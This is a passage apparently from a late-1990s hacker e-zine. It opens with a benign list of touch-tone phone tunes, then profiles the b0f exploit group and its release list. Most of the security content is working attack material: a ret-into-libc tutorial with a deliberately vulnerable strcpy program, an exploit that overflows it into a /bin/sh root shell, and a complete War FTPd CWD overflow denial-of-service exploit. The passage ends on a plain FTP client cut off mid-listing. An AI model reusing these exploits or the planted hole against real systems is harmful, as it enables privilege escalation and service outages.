      Ha ppy  birth day  to  you [Lyrics to this song]
      
      <snipped ALL versions of the NEXT LINE>
      
      1   1     #    9    6     3  2 [Numbers to press for the notes. First
                                      version of the third line. Steve Prior
                                      is given credit for this line.]
                                     [This line is blank because the Craze's 
                                      version of this song was only 2 lines
                                      long.]
      1   1     0    8    5     2  1 [Numbers to press for the notes. Third
                                      version of the third line. Tina R. 
                                      Jones / Keith Murdock is given credit
                                      for this line.]
      Ha ppy  birth day  dear  [na me] [Lyrics to this song.]
      
      In the html version, the entires are also color coded by version.
      
      If you still don't understand, you can find a much easier to read html
      version of this FAQ at http://members.xoom.com/twpyhr0/tttfaq.html.
      
      
      8. Where can I find the most current version of this FAQ?
      
         You can find the most current version of this faq at
         http://members.xoom.com/twpyhr0/tttfaq.htm.
      
      
      9. Where can I submit an entry for "The Unofficial Touch Tone Tune
         FAQ"?
      
         Email your entry to jennmartino@my-deja.com.
      
      
      10. What are some examples of touch tone tunes?
      
          See below.  
      
                                                              
      ______________________________________________________________________
      
      (1) America the Beautiful 
          Credits: United Phone Losers (http://www.phonelosers.net)
                   The Craze
      
      5     5   6     1   5    9 
      My  coun try  'tis  of  thee 
      
      0       0    8   0   8  4  
      Sweet  land  of  li ber ty 
      
      8    4    2   5/4 
      of  thee  I  sing 
      
      ______________________________________________________________________
      
      (2) Arabian Tune 
          Credit: Ron Dippold
      
      453 54 4569564 459 9#95458 8987 453 54 
      
      ______________________________________________________________________
      
      (3) A Tisket, A Tasket 
          Credit: The Craze
      
      6   6   4   8   6   4    8    6     6    6   9    6   4 
      A  tis ket  a  tas ket,  a  green  and  yel low  bas ket, 
      
      4    6    6   4   4   6   6    4     8   6    9    6   0     6     4
      I  wrote  a  let ter  to  my  love  and  on  the  way  I  dropped  it
      
      8     6     4   8     6     4    8   6    9    6   0     6     4
      I  dropped  it  I  dropped  it  and  on  the  way  I  dropped  it
      
      8   6   6    4      6     6   4    8    6   9   6    0    6   4  
      A  lit tle  girl  picked  it  up  and  put  it  in  her  poc ket 
      
      8     6   4    8    6   4  
      Her  poc ket  her  poc ket.. 
      
      ______________________________________________________________________
      
      (4) Auld Lang Syne <=
          Credits: Steve Prior (http://users.javanet.com/~sprior/)
                  The Craze
      
      1 1 1 1 3 2 1 2 
      3 2 1 1 3 9 # 
      # 9 3 3 1 2 1 2 
      3 2 1 # # 9 1  
      
      8        4    4    4     6    8    4   8 
      Should  auld  ac quain tance  be  for got 
      
      9    1    4    3     9     # 
      in  days  of  auld  lang  syne 
      
      ______________________________________________________________________
      
      (5) California, Here I Come 
          Credit: The Craze
      
      8   8  8   8    9    8   1 
      Cal i for nia  here  I  come 
      
      3       3      3   3   6    3    4 
      Right  back  where I  star ted  from. 
      
      ______________________________________________________________________
      
      (6) Do Wah Diddy <=
          Credit: UbiOne
      
      5    5   5   5   5   5    6   6   4   5 
      Do  wah  di tty  di tty  dum  di tty  do 
      
      ______________________________________________________________________
      
      (7) Frere Jacques <=
          Credits: Steve Prior (http://http://users.javanet.com/~sprior/)
                   The Craze
                  Tony / Keith Murdock
                  Keith Murdock
                                        
      1 2 3 1 
      1 2 3 1 
      3 6 9  
      3 6 9 
      9 #/* 9 6 3 1 
      9 #/* 9 6 3 1 
      1 9/1 1 
      1 9/1 1
      
      4 2 6 4, 
      4 2 6 2, 
      6 9 #, 
      6 9 #
      
      4 5 6 4, 
      4 5 6 4, 
      6 9 #, 
      6 9 #, 
      # * # 9 6 4, 
      # * # 9 6 4, 
      4 1 4, 
      4 1 4
      
      ______________________________________________________________________
      
      (8) Happy Birthday <=
          Credits: Steve Prior (http://http://users.javanet.com/~sprior/)
                   The Craze
                   Tina R. Jones / Keith Murdock
      
      1   1     2    1   6    3 
      4   4     2    4   #    8  
      1   1     2    1   6    3 
      Ha ppy  birth day  to  you 
      
      1   1     2    1   9    6 
      1   1     2    1   9    8 
      1   1     2    1   9    6 
      Ha ppy  birth day  to  you 
      
      1   1     #    9    6     3  2 
      
      1   1     0    8    5     2  1 
      Ha ppy  birth day  dear  [na me] 
      
      9   6     9     3   6    3 
      
      0   0     8     1   2    1 
      Ha ppy  birth  day  to  you 
      
      ______________________________________________________________________
      
      (9) Here We Go 'Round the Mulberry Bush 
          Credit: The Craze
      
      4     4   4      2     2    6    6   2    4 
      Here  we  go  'round  the  mul  ber  ry  bush 
      
      4     8   8  8    8     6    2   4  4    4  
      The  mul ber ry  bush  the  mul ber ry  bush 
      
      4     4   4      2     2    6   6  2    4 
      Here  we  go  'round  the  mul ber ry  bush 
      
      4    8  8   6    8    4    4 
      so  ear ly  in  the  morn ing
       
      ______________________________________________________________________
      
      (10) Hot Crossed Buns 
           Credit: Untied Phone Losers (http://www.phonelosers.net)
      
      3 2 1 
      3 2 1 
      1 1 1 1 
      2 2 2 2 
      3 2 1 
      ______________________________________________________________________
      
      (11) I've Been Working on the Railroad 
           Credit: The Craze
      
      7      2     4    5   4    2    6    4 
      I've  been  work ing  on  the  rail road 
      
      ______________________________________________________________________
      
      (12) Jingle Bells 
           Credits: The Craze
                    Tony / Tina R. Jones / Keith Maddock
      
      6    6     6      6   6     6 
      3    3     3      3   3     3  
      Jin gle  bells,  Jin gle  bells 
      
      6    #    7    8    6  
      3    9    1    2    3 
      Jin gle  all  the  way 
      
      9     9     9   9   9   5    5 
      6     6     6   6   6   3    3 
      Oh,  what  fun  it  is  to  ride  
      
      5   5   5    7    4  5     6 
      3   3   3    2    2  32    9 
      in  a  one horse  o pen  sleigh 
      
      ______________________________________________________________________
      
      (13) London Bridge 
           Credit: United Phone Losers (http://www.phonelosers.net)
      
      6    9     6     8    7    8    6  
      Lon don  bridge  is  fall ing  down 
      
      1     4    5      7    8    9 
      Fall ing  down,  fall ing  down 
      
      6    9     6     8    7    8    6  
      Lon don  bridge  is  fall ing  down 
      
      8    6    0  4 
      my  fair  la dy
       
      ______________________________________________________________________
      
      (14) Louie, Louie <= 
           Credits: Steve Prior (http://http://users.javanet.com/~sprior/)
      
      1 1 1 
      6 6 
      9 9 9 
      6 6 
      
      ______________________________________________________________________
      
      (15) Mary Had a Little Lamb <=
           Credits: Steve Prior
                    The Craze
                    Recycler / Keith Maddock
                    Keith Maddock
      
      3  2    1   2  3   3     3 
      6  2    4   0  6   6     6 
      3  2    1   2  3   3     3 
      3  2    1   2  3   3     3  
      Ma ry  had  a  li ttle  lamb 
      
      2    2    2      3   9    9  
      2    2    2      6   6    6 
      2    2    2      1   3    3 
      2    2    2      1   3    3  
      lit tle  lamb,  lit tle  lamb 
      
      3  2    1   2  3   3     3 
      6  0    4   0  6   6     6 
      2  1    2   3  3   3     3 
      3  2    1   2  3   3     3 
      Ma ry  had  a  li ttle  lamb 
      
      3      2     2     3    2    1 
      6      8     8     6    8    4 
      2      2     2     3    2    1 
      3      2     2     2    3    2 
      Its  fleece  as  white  as  snow 
      
      ______________________________________________________________________
      
      (16) Mister Sandman 
           Credit: United Phone Losers (http://www.phonelosers.net)
      
      4    2    6    2  
      Mis ter  sand man  
      
      6     6  2   6 
      Bring me a dream 
      
      ______________________________________________________________________
      
      (17) Old McDonald had a Farm 
           Credit: The Craze
      
      6     6    6   7    8   8   7 
      Old  Mac  Don ald  had  a  farm 
      
      9     9     0     0     4  
      E  -  I  -  E  -  I  -  O 
      
      4    6    6     6    7    8   8      7 
      And  on  this  farm  he  had  some  chicks 
      
      9     9     0     0     4  
      E  -  I  -  E  -  I  -  O 
      
      4     4    4      4     4     4   4    4      4      4 
      With  a  chick  chick  here  and  a  chick  chick  there 
      
      4     4    4      4    4    4     4  4     4    4    4      4
      Here  a  chick  there  a  chick  ev' ry  where  a  chick  chick
      
      6     6    6   7    8   8   7 
      Old  Mac  Don ald  had  a  farm 
      
      9     9     0     0     4  
      E  -  I  -  E  -  I  -  O 
      
      ______________________________________________________________________
      
      (18) Olympic Fanfare 
           Credit: Tina R. Jones / Keith Maddock
      
      3 9 9 12 3 1, 
      2 2 2 2 3 2 1 1 2 3 1 2, 
      3 9 9 1 2 3 1, 
      2 2 2 2 3 2 1 1 2 3 2 1
      
      ______________________________________________________________________
      
      (19) Pop Goes the Weasel 
           Credit: The Craze
      4    4   8     8    6   8  6    1 
      All  a round  the  mul ber ry  bush 
      
      4     4   4     8      6    0   4 
      The  mon key  chased  the  wea sel 
      
      4     4   4      8       8    6  7  6    1  
      The  mon key  thought  'twas  al-l  in  fun 
      
      5     1     6    0   4  
      Pop  goes  the  wea sel 
      
      ______________________________________________________________________
      
      (20) Rambling Wreck from Georgia Tech 
           Credit: The Craze
      
      6    8   4    4      4 
      I'm  a  ram bling  wreck  
      
      8      6    6    6 
      from  Geor gia  Tech  
      
      8    4   8    6   8   4   0   4  
      and  a  hell  of  an  en gin eer 
      
      ______________________________________________________________________
      
      (21) Ring Around the Rosy
           Credit: United Phone Losers (http://www.phonelosers.net)
      
      8      8     8      6      0  4 
      Ring  a round  the  ros y 
      
      4   8    8     8    6    0   4 
      A  poc ket  full  of  pos ies 
      
      0     4   0     4 
      Ash es  Ash es 
      
      4     0   0      4 
      We  all  fall  down 
      
      ______________________________________________________________________
      
      (22) Row, Row, Row Your Boat 
           Credit: The Craze
      
      4      4     4    8     6 
      Row,  row,  row  your  boat 
      
      6    2    6     9      # 
      gen tly  down  the  stream 
      
      #   #  #     0  0  0     *  *  *    4  4  4 
      Mer ri ly,  Mer ri ly,  Mer ri ly, Mer ri ly, 
      
      6     2    2   1    1 
      Life  is  but  a  dream 
      
      ______________________________________________________________________
      
      (23) Shave and a Haircut 
           Credit: The Craze
      
      9       4   4   2    1     6    6 
      Shave  and  a  hair cut,  two  bits 
      
      ______________________________________________________________________
      
      (24) She'll Be Comin' 'Round the Mountain 
           Credit: The Craze
      
      4       8    #   #      #     #    8    4     4     8    4
      She'll  be  com in'  'round  the  moun tain  when  she comes
      
      ______________________________________________________________________
      
      (25) Strangers in the Night 
           Credit: Uniter Phone Losers (http://www.phonelosers.net)
      
      4      8    8    4     8 
      Stran gers  in  the  night 
      
      4    8    6    8    4 
      Ex chang ing  glan ces 
      
      ______________________________________________________________________
      
      (26) Swannee River 
           Credit: The Craze
      
      3     2    1   3    2    1   0    4  5 
      Way  down  up  on  the  Swan ee  Riv er 
      
      6     8   4  2 
      Far  far  a way 
      
      3         2     1    3    2 
      That's  where  my  heart  is 
      
      1     9   4  5 
      Turn ing  ev er 
      
      6         5     4    2     2     4 
      That's  where  the  old  folks  stay 
      
      ______________________________________________________________________
      
      (27) Twinkle, Twinkle Little Star 
           Credit: United Phone Losers (http://www.phonelosers.net)
      
      1     1    9    9    0   0    9 
      Twin kle  twin kle  lit tle  star 
      
      ______________________________________________________________________
      
      (28) The Butterfly Song 
           Credit: Tony / Keith Maddock
      
      9 6 3, 
      2 3 6 2 1, 
      3 6 9 3 2 3 6 2 3 6 9 3 2 3 6 2, 
      9 6 3, 
      2 3 6 2 1 
      
      ______________________________________________________________________
      
      (29) The Old Grey Mare 
           Credit: The Craze
      
      4     4     4      4      8     6       6      8     6    8   4
      The  old   gray   mare   she   ain't   what   she   used  to  be, 
      
      8       8     4    8    8   4 
      Ain't  what  she  used  to  be 
      
      6       6     8    6    8   4 
      Ain't  what  she  used  to  be 
      
      4     4    4     4     8     6     6     8    6    8   4 
      The  old  gray  mare  she  ain't  what  she  used  to  be,
      
      8  8    8      6    8 4 
      Ma ny  long  years  a go 
      
      ______________________________________________________________________
      
      (30) The Wedding March 
           Credit: United Phone Losers (http://www.phonelosers.net)
      
      1      3    3    3 
      Here comes the bride  
      
      1      9    6    6 
      all dressed in white 
      
      ______________________________________________________________________
      
      (31) Three Blind Mice 
           Credit: The Craze
      
      6        8     4       6      8     4 
      Three  blind  mice,  three  blind  mice 
      
      9     5    5     4     9    5    5     4 
      See  how  they  run,  see  how  they  run 
      
      ______________________________________________________________________
      
      (32) When Johnny Comes Marching Home
           Credit: The Craze
      
      8      4   4     4      4    8    6    8  6  
      When  john ny  comes  march ing  home  a gain 
      
      *    5     *   5 
      Hur rah!  Hur rah! 
      
      8       4     4   4    4   8   6   8     6  
      We'll  give  him  a  heart y  wel come  then 
      
      9    5    #   5 
      Hur rah! Hur rah! 
      
      5     #    #      #      5    9     9      9 
      The  men  will  cheer,  the  boys  will  shout 
      
      5     6   6    6     4     8    8     8 
      The  lad ies  they  will  all  turn  out 
      
      4      8     #    9     6    8     4   4     4      4    0    4
      And  we'll  all  feel  gay  when  John ny  comes  march ing  home
      
      ______________________________________________________________________
      
      (33) Yankee Doodle 
           Credit: The Craze
      
      4      4     2     6     4     6     2 
      Yan kee  doo dle  went  to  town 
      
      4     4    2   6   4   1 
      Rid ing  on  a  po ny 
      
      4      1    5   6   4    6    2    4    4     2    6  4 1  1 
      Stuck  a  feath er  in  his  hat  and called  it  mac a ro ni
      
      ______________________________________________________________________
      
      Credits:
      -------
      
      
      
      FAQ Answers:
      -----------
      
      TELCOM Digers Telecom FAQ (http://hyperarchive.lcs.mit.edu/telecom-archives/)
      
      
      
      Touch Tone Tune Entries:
      -----------------------
      
      "The Canonical List of Touch-Tone Phone Songs" by Keith Maddock
      
      "The Push Button Telephone Song Text File" by The Craze
      
      United Phone Losers (http://www.phonelosers.net)
      
      Ron Dippold
      
      Tina R. Jones
      
      Keith Maddock
      
      Steve Prior (http://http://users.javanet.com/~sprior/)
      
      UbiOne
      
      Recycler
      
      The Craze
      
      Tony
      
      
      
      Ascii Art:
      ---------
      
      Joan Stark
      
      
      @HWA     
      
27.1  Introducing b0f (BufferOverflow Security)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      The following few peices are from the b0f site
      http://www.b0f.com/
      
      Efnet channel: (Usually occupied during meetings only)
      #b0f
      
      Site is under major construction, if you're interested
      in doing site design, contact slash or anyone in #b0f.
      
      
      Members:
      
      Lamagra: C/C++/PERL/ASM/HTML/PHP coder, unix/win32 security

      Prizm: irix (and general unix) security, rebol and python programming

      Venglin: linux/freebsd security and c/c++/asm programming

      Slash: NT security and SQL programming

      axess: firewalls, unix/NT security, c and shell scripting

      eth0: linux security, c programming

      mordrian: linux security, c/c++/asm/perl programming

      digital monkey: dos32 asm/c, win32/linux security

      sirius: linux security and c programming      
      
      
      Releases: (Many shown here in following sections)
      
      buffer0verfl0w security /home/code

      Programs sorted by date of post.

      warftpd-exploit.c       Kills a Warftpd server using a MKD/CWD overflow
      ftpcat.cpp              Ftpcat is a c++ program that allows users to 
                              get/put files and dirlistings from a ftp-server
                              by lamagra
      man.c                   Redhat 6.1 /usr/bin/man exploit. Gives egid=man 
                              by venglin
      amd.tgz                 Spoofed rpc.amd remote exploit with 3 sets of 
                              shellcode. Gives remote root by lamagra
      proftp_ppc.c            Proftpd pre <=6 remote exploit for linuxppc 
                              by lamagra
      dope_expl.c             Dopewars 1.4.4 remote exploit for server and 
                              client by lamagra
      sysbg.c                 Simple Backdoor. Shell on a port with password
                              support by eth0
      pirchslap.c             Pirch98 ident/fserve daemon DoS attack. by eth0
      standalone.sh           Simple ipchains frontend script to help you 
                              configure ipchains for standalone... by eth0


      buffer0verfl0w security /home/advisories
      
      
      nt-1.txt                 Windows NT Security Check Part I
      nt-2.txt                 Windows NT Security Check Part II
      omega.txt                New way of exploiting buffer overflows: ret-into-libc
      
      
      Hopefully we'll receive some info and background or bio's on the group to 
      further introduce you all to the crew, this was all the info I could accrue
      for this issue since it is a new and emerging group... - Ed
      
      
      @HWA


28.0  New way of exploiting buffer overflows ret-into-libc by lamagra (b0f)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
      
      
      Source: http://www.b0f.com/
      
      
      
      
      
      
                              The OMEGA project finished
                    +=+-+=+-+=+-+=+-+=+-+=+-+=+-+=+-+=
                        By lamagra <lamagra@uglypig.org>

      
      ---[ Flashback
      
      In my previous paper, i explained why and a little bit about how.
      There were some difficulties:
              o sending arguments to the system() call.
                (we fixed this using an other program to link the garbage to a shell.)
      
      
      ---[ Examination of a program flow
      
      We take this little example program to examine the flow.
      
      <++> omega/example.c
      void foo(char *bla)
      {
        printf("I got passed %p\n",bla);
      }
      
      void main()
      {
           foo("fubar");
      }
      <--> 
      
      We compile and fire up gdb.
      
      darkstar:~/omega$ gcc example.c -o example
      darkstar:~/omega$ gdb example
      
      GNU gdb 4.17
      Copyright 1998 Free Software Foundation, Inc.
      GDB is free software, covered by the GNU General Public License, and you are
      welcome to change it and/or distribute copies of it under certain conditions.
      Type "show copying" to see the conditions.
      There is absolutely no warranty for GDB.  Type "show warranty" for details.
      This GDB was configured as "i586-slackware-linux"...
      (gdb) disassemble main
      Dump of assembler code for function main:
      0x8048594 <main>:       pushl  %ebp
      0x8048595 <main+1>:     movl   %esp,%ebp
      0x8048597 <main+3>:     pushl  $0x8049099
      0x804859c <main+8>:     call   0x804857c <foo>
      0x80485a1 <main+13>:    addl   $0x4,%esp
      0x80485a4 <main+16>:    movl   %ebp,%esp
      0x80485a6 <main+18>:    popl   %ebp
      0x80485a7 <main+19>:    ret    
      End of assembler dump.
      (gdb) x/5bc 0x8049099
      0x8049099 <_fini+25>:   102 'f' 117 'u' 98 'b'  97 'a'  114 'r'
      (gdb) disassemble foo
      Dump of assembler code for function foo:
      0x804857c <foo>:        pushl  %ebp
      0x804857d <foo+1>:      movl   %esp,%ebp
      0x804857f <foo+3>:      movl   0x8(%ebp),%eax
      0x8048582 <foo+6>:      pushl  %eax
      0x8048583 <foo+7>:      pushl  $0x8049088
      0x8048588 <foo+12>:     call   0x8048400 <printf>
      0x804858d <foo+17>:     addl   $0x8,%esp
      0x8048590 <foo+20>:     movl   %ebp,%esp
      0x8048592 <foo+22>:     popl   %ebp
      0x8048593 <foo+23>:     ret    
      End of assembler dump.
      (gdb) quit
      darkstar:~/omega$
      
      
      We notice the address of our "fubar" string getting pushed on the stack
      at 0x8048597. After that the foo function is called (0x804859c). 
      After initialisation foo() loads the pushed address into the eax register
      as we can see at 0x804857f. The address is located on 0x8(%ebp), ebp is
      the current stack pointer. 
      
      ---[ Implementation
      
      With the previous in mind we write a small test program.
      
      <++> omega/test.c
      /* 
       * A small test program for project "omega"
       * Lamagra <lamagra@uglypig.org>
       */ 
      
      foo(char *bla)
      {
        printf("foo: %p\n",bla);
        printf("foo: %s \n",bla);
      }
      
      
      main()
      {
        char bla[8];
        char *shell = "/bin/sh";
        long addy = 0x41414141;
      
        printf("foo = 0x%x\n",(long)&foo);
        printf("bla = 0x%x\n",(long)&bla);
        printf("shell = 0x%x\n",shell);
        
        *(long *)&bla[0] = addy;   /* buffer */
        *(long *)&bla[4] = addy;   /* buffer */
        *(long *)&bla[8] = addy;   /* saved ebp */
        *(long *)&bla[12] = &foo;  /* saved eip */
        *(long *)&bla[16] = addy;  /* Junk */
        *(long *)&bla[20] = shell; /* address of the arg */
      }
      <-->
      
      The comment explain the use pretty clear, so read them.
      Afterwards compile and run.
      
      darkstar:~/omega$ gcc test.c -otest
      darkstar:~/omega$ test
      foo = 0x804857c
      bla = 0xbffffb08
      shell = 0x8049111
      foo: 0x8049111
      foo: /bin/sh
      segmentation fault
      darkstar:~/omega$ 
      
      The foo function gets called and its argument is placed correctly.
      But after execution it segfaults, let's debug it and find out why.
      
      darkstar:~/omega$ gdb test
      
      GNU gdb 4.17
      Copyright 1998 Free Software Foundation, Inc.
      GDB is free software, covered by the GNU General Public License, and you are
      welcome to change it and/or distribute copies of it under certain conditions.
      Type "show copying" to see the conditions.
      There is absolutely no warranty for GDB.  Type "show warranty" for details.
      This GDB was configured as "i586-slackware-linux"...
      (gdb) break *foo
      Breakpoint 1 at 0x804857c
      (gdb) run
      Starting program: /tmp/omega/hello 
      foo = 0x804857c
      bla = 0xbffffb10
      shell = 0x8049111
      
      Breakpoint 1, 0x804857c in foo ()
      (gdb) x/10wx 0xbffffb10
      0xbffffb10:     0x41414141      0x41414141      0x41414141      0x0804857c
      0xbffffb20:     0x41414141      0x08049111      0xbffffb44      0x00000000
      0xbffffb30:     0x00000000      0x00000000
      (gdb) c
      Continuing.
      foo: 0x8049111
      foo: /bin/sh
      
      Program received signal SIGSEGV, Segmentation fault.
      0x41414141 in ?? ()
      (gdb) info reg ebp
      ebp            0x41414141       0x41414141
      (gdb) info reg esp
      esp            0xbffffb24       0xbffffb24
      (gdb) quit
      The program is running.  Exit anyway? (y or n) y
      darkstar:~/omega$ 
      
      The dumb of buffer "bla" shows our intentions very clearly.
      The segfault happens because the program tries to execute 0x41414141.
      That address is at 0xbffffb20. When returning from foo() ebp and eip are
      poped from the stack at the location pointed to by esp. 
      If we wanted to put right the segfault, we could put an other address in
      there (eg. exit()), so it has a clean exit.
      
      Apply this patch to fix it (patch test.c test.patch).
      
      <++> omega/test.patch
      --- old.c       Wed Oct  6 18:49:07 1999
      +++ test.c      Wed Oct  6 18:49:25 1999
      @@ -19,6 +19,6 @@
         *(long *)&bla[4] = addr;   /* buffer */
         *(long *)&bla[8] = addr;   /* saved ebp */
         *(long *)&bla[12] = &foo;  /* saved eip */
      -  *(long *)&bla[16] = addr;  /* Junk */
      +  *(long *)&bla[16] = &exit; /* exit() */
         *(long *)&bla[20] = shell; /* address of the arg */
       }
      <-->
      
      Same thing can be done for multiple arguments.
      0x8(%ebp)  = arg[1]
      0xc(%ebp)  = arg[2]
      0x10(%ebp) = arg[3]
      and so on.
      
      <++> omega/multiple.c
      #include <stdlib.h>
      #include <unistd.h>
      
      main()
      {
        char bla[8];
        char *shell = "/bin/sh";
        long addr = 0x41414141;
      
        printf("bla = 0x%x\n",(long)&bla);
        printf("shell = 0x%x\n",shell);
        
        *(long *)&bla[0]  = addr;   /* buffer */
        *(long *)&bla[4]  = addr;   /* buffer */
        *(long *)&bla[8]  = addr;   /* saved ebp */
        *(long *)&bla[12] = &execl; /* saved eip */
        *(long *)&bla[16] = &exit;  /* exit() */
        *(long *)&bla[20] = shell;  /* arg[1] */
        *(long *)&bla[24] = shell;  /* arg[2] */
        *(long *)&bla[28] = 0x0;    /* arg[3] */
        /* 
         * Executes execl("/bin/sh","/bin/sh",0x0); 
         * On error exit("/bin/sh"); i know weird */
         */
      }
      <-->
      
      
      Now we can exploit a bufferoverflow in a secure environement.
      What about in the wild?
      
      <++> omega/hole.c
      /* 
       * The hole program.
       * Prints the address of system() in libc and overflows.
       */
      #include <stdlib.h>
      #include <dlfcn.h>
      
      main(int argc, char **argv)
      {
         char buf[8];
         long addr;
         void *handle;
      
         handle = dlopen(NULL,RTLD_LAZY);   
         addr = (long)dlsym(handle,"system");
         printf("System() is at 0x%x\n",addr);
      
         if(argc > 1) strcpy(buf, argv[1]);
      }
      <-->
      
      <++> omega/exploit.c
      /* 
       * The exploit
       * Finds the address of system() in libc.
       * Searches for "/bin/sh" in the neighbourhood of system().
       * (System() uses that string)
       * Lamagra <lamagra@uglypig.org>
       */ 
      
      #include <stdlib.h>
      #include <dlfcn.h>
      
      main(int argc, char **argv)
      {
         int x,size;
         char *buf;
         long addr,shell,exitaddy;
         void *handle;
      
         if(argc != 3){
              printf("Usage %s <bufsize> <program>\n",argv[0]);
              exit(-1);
         }
       
         size = atoi(argv[1])+16;
         if((buf = malloc(size)) == NULL){
              perror("can't allocate memory");
              exit(-1);
         }
      
         handle = dlopen(NULL,RTLD_LAZY);   
         addr = (long)dlsym(handle,"system");
         printf("System() is at 0x%x\n",addr);
      
         if(!(addr & 0xff) || !(addr & 0xff00) || 
            !(addr & 0xff0000) || !(addr & 0xff000000))
         {
              printf("system() contains a '0', sorry!");
              exit(-1);
         }
      
         shell = addr;
         while(memcmp((void*)shell,"/bin/sh",8)) 
              shell++;
      
         printf("\"/bin/sh\" is at 0x%x\n",shell);
         printf("print %s\n",shell);
      
         memset(buf,0x41,size);
         *(long *)&buf[size-16] = 0xbffffbbc;    
         *(long *)&buf[size-12] = addr; 
         *(long *)&buf[size-4]  = shell;    
         
         puts("Executing");
      
         execl(argv[2],argv[2],buf,0x0);
      }
      <-->
      
      darkstar:~/omega$ gcc hole.c -ohole -ldl
      darkstar:~/omega$ gcc omega.c -oomega -ldl
      darkstar:~/omega$ omega 8 vun
      System() is at 0x40043a18
      "/bin/sh" is at 0x40089d26
      print /bin/sh
      Executing
      System() is at 0x40043a18
      bash# 
      
      Looks like it works.
      But as you may have noticed an extra library is linked for this methode.
      That's why it doesn't work on programs that don't have that library
      linked: because the location of system() is different.
      
      There are other methodes to get the correct address:
      
              o Changing the program to let it print out the address (more or
                less the same) 
              
              o Getting the address from the ELF-headers. ( I think this doesn't
                work on stripped files, solution recompile)
      
              o getting the address of atexit() (always available) and calculate
                the address of system(). Check out included program.
      
      ---[ Extra
      
      <++> omega/calc.c
      #include <stdlib.h>
      #include <unistd.h>
      
      main(int argc, char **argv)
      {
        long addy,diff;
      
        if (argc != 2)
        {
              printf("Usage: %s <addy of atexit>\n",argv[0]);
              printf("Get the address with GDB\n\t$ echo x atexit|gdb program\n");
              exit(-1);
        }
      
        addy = strtoul(argv[1],0,0);
        printf("Input = 0x%x\n",addy);
      
        diff = (long)&atexit - (long)&system;
        printf("system() = 0x%x\n",addy - diff + 16); 
      }
      <-->
      ---[ Reference
      
        my previous paper in corezine #2 (http://bounce.to/unah16)
      
      
      ---[EOF
      
      @HWA
      


29.0  warftpd.c exploit code from b0f
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Source: http://www.b0f.com/    
      
      /* coded by eth0 from buffer0verfl0w */
      /* tested by morpha */
      /* *NOTE* Original exploit was coded for winbl0wz *NOTE */
      /*
      Vulnerable:
      War FTPd version 1.66x4 
      War FTPd version 1.67-3
      
      Immune:
      War FTPd version 1.67-4
      War FTPd version 1.71-0
      
      The buffer overflow seems to occur because the bound check of the command of MKD/CWD is
      imperfect. This means that although anyone can overflow the statically assigned buffer
      that stores the requested path, you cannot overwrite the RET address and therefore it's
      impossible to cause War FTPd to execute arbitrary code.
      However, it is a simple mechanism for performing a Denial-of-Service against the
      server.
      
      Solution:
      War FTPd 1.70-1 does fix this problem, but it contains other vulnerabilities (see our
      additional information section).
      */
      
      #include <stdio.h>
      #include <strings.h>
      #include <errno.h>
      #include <signal.h>
      #include <sys/syscall.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <netdb.h>
      
      #define FTP_PORT 21
      #define MAXBUF 8182
      //#define MAXBUF 553
      #define MAXPACKETBUF 32000
      #define NOP 0x90
      #define PASS "PASS eth0@owns.your.ass.com\r\n"
      #define LOGIN "USER anonymous\r\n"
      int expl0it(char *host)
      {
        struct hostent *hp;
        struct in_addr addr;
        struct sockaddr_in s;
        static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
        /* u_char buf[280]; */
        int p, i;
      
      
       
        hp = gethostbyname (host);
        if (!hp) exit (1);
      
        bcopy (hp->h_addr, &addr, sizeof (struct in_addr));
        p = socket (s.sin_family = 2, 1, IPPROTO_TCP);
        s.sin_port = htons (FTP_PORT);
        s.sin_addr.s_addr = inet_addr (inet_ntoa (addr));
       
        if(connect (p, &s, sizeof (s))!=0)
        {             printf("[%s:%s] <-- doesn't seem to be listening\n",host,FTP_PORT);
                      return;
        }
        else {
        printf("Connected!\n");
         
        write(p, LOGIN, strlen(LOGIN));
       /* printf("Writing [%s] to server\n",LOGIN); */
        write(p, PASS, strlen(PASS));
      /*  printf("Writing [%s] to server\n",PASS); */
        
        memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
         sprintf((char *)packetbuf,"CWD %s\r\n",buf);
        send(p,(char *)packetbuf,strlen((char *)packetbuf),0);
       /* printf("Writing [%s] to server\n",packetbuf); */
        printf("DONE!\n");
        
        
        }
        return(0);
      }
      
      int main(int argc, char *argv[])
      {
              if(argc<2)
              {
                      printf("Usage: %s [host] \n",argv[0]);
                      return;
              }
              else
                      {
                      expl0it(argv[1]);
                      }
      return(0);
      }
      
      @HWA
      


30.0  FTPCAT 1.0 by lamagra (b0f)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~     
      
      
      Source: http://www.b0f.com/    
      
      /* 
       *                  FTPCAT v1.0
       *
       *      This is the first C++ example i wrote. If you have any comments on it
       *  please mail me or use the form on my site.
       *
       *  Ftpcat is a simple program, that allows users to upload and download
       *  files and dirlistings from a ftpserver. Check usage for the commands.
       *
       *  Have fun
       *  
       *  -lamagra (access-granted@geocities.com)
       *  http://lamagra.seKure.de
       */
      
      
      /* INCLUDES */
      #include <stdlib.h>
      #include <iostream.h>
      #include <stdio.h>
      #include <stdarg.h>
      #include <netinet/in.h>
      #include <sys/socket.h>
      #include <sys/types.h>
      #include <unistd.h>
      #include <netdb.h>
      #include <arpa/inet.h> // inet_addr()
      #include <string.h> // strerror()
      #include <ctype.h> // isdigit()
      #include <fcntl.h>
      
      /* DEFINES */
      #define ANON_PASS "Ftpcat@lamagra.seKure.de"
      
      /* PROTOCOLS + CLASSES */
      void error_quit(char *msg,...);
      extern int errno;
      extern int optind;
      extern char *optarg;
      char *host, *user,*path;
      
      class ftp
      {
              int ftpsock;
        public:
              long port;
              int list;
      
              set_default();
              connectto(char *host);
              login(char *user);
              disconnect();
              unsigned long resolve(char *host);
              sendcmd(char *text, ...);
              int get_response();
              int get_file();
              int put_file();
              int dataconn();
      };
      
      /* FUNCTIONS */
      void error_quit(char *msg,...)
      {
              va_list va;
      
              va_start(va, msg);
              vfprintf(stderr, msg, va);
              va_end(va);
              exit(-1);
      }
      
      usage(char *progname)
      {
          printf("Ftpcat by lamagra (http://lamagra.seKure.de)\n");
          printf(
                  "Usage: %s [options] user@host:port/path/(file/dir)\n"
                  "\t port is optional\n"
                  "\t -h and -?: this text\n"
                  "\t -l: show dir-contents\n"
                  "\t -p: put a file\n"
